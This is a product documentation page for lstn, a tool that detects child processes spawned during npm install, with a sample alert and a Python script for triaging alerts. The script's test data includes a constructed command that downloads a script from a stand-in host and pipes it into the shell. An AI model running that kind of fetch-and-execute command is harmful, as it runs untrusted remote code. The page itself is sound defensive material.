Malicious child processes

Coming soon

Lstn detects child processes by monitoring process activity on the system where it is installed and running. When a parent process spawns a new process, lstn collects information about both processes, including the command line used to start the new process and the name of the parent process. It then uses this information to generate a message indicating that the parent process has spawned a new process, in this case "npm install spawned a process".

For example:

  [medium] npm install spawned a process (from transitive dependency contextify@0.1.15)
    commandline: sh -c node-gyp rebuild
    executable_path: /bin/sh
    parent_name: node

During build time, malicious child processes can be spawned to carry out activities such as:

  • crypto mining

  • reverse shells

  • insertion of malicious payloads
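One way to triage these alerts, as an added example that is not lstn's own code: it parses the text format shown above and queues any finding whose command is not a plain call to an expected build tool. The allowlist, the function names and the second sample finding are assumptions made for illustration.

```python
import re
import shlex

# Header format as shown in the alert above:
#   [severity] message (from transitive dependency name@version)
HEADER = re.compile(r"^\[(?P<severity>\w+)\]\s+(?P<message>.*?)"
                    r"(?:\s+\(from \w+ dependency (?P<package>\S+)\))?$")
# Assumption: build tools this project expects install scripts to run.
EXPECTED_BUILD_TOOLS = {"node-gyp", "node-pre-gyp", "prebuild-install"}
# The first finding is the one on this page; the second is constructed.
SAMPLE = """\
[medium] npm install spawned a process (from transitive dependency contextify@0.1.15)
    commandline: sh -c node-gyp rebuild
    executable_path: /bin/sh
    parent_name: node
[medium] npm install spawned a process (from transitive dependency example-pkg@1.0.0)
    commandline: sh -c curl -s https://example.invalid/setup.sh | sh
    executable_path: /bin/sh
    parent_name: node
"""

def parse_findings(text):
    """Return one dict per finding: header fields plus its key: value lines."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            findings.append(m.groupdict())
        elif findings and ":" in line:
            key, _, value = line.partition(":")
            findings[-1][key.strip()] = value.strip()
    return findings

def is_expected(finding):
    """True only when the command is a plain call to an allowlisted build tool."""
    try:
        argv = shlex.split(finding.get("commandline", ""))
    except ValueError:
        return False  # unbalanced quoting: send to review
    if argv[:2] in (["sh", "-c"], ["/bin/sh", "-c"]):
        argv = argv[2:]  # unwrap the shell wrapper used for install scripts
    if any(re.search(r"[|;&`$<>]", tok) for tok in argv):
        return False  # pipes, chaining, substitution or redirection
    return bool(argv) and argv[0] in EXPECTED_BUILD_TOOLS

def review_queue(text):
    """Return (package, commandline) for every finding that needs review."""
    return [(f.get("package"), f.get("commandline"))
            for f in parse_findings(text) if not is_expected(f)]
```

Calling `review_queue(SAMPLE)` leaves only the constructed `example-pkg@1.0.0` finding; the `node-gyp rebuild` call from `contextify@0.1.15` is treated as an expected native build step.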

© 2023 Garnet Labs